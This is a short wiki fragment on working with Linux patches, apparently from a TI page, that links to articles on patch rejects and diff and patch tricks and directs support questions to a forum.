    See handling patch rejects article.

    Diff and patch tricks

    See (slightly outdated, it mentions BitKeeper) diff and patch tricks article.

    For technical support please post your questions at http://e2e.ti.com. Please post only comments about the article Working with Linux patches here.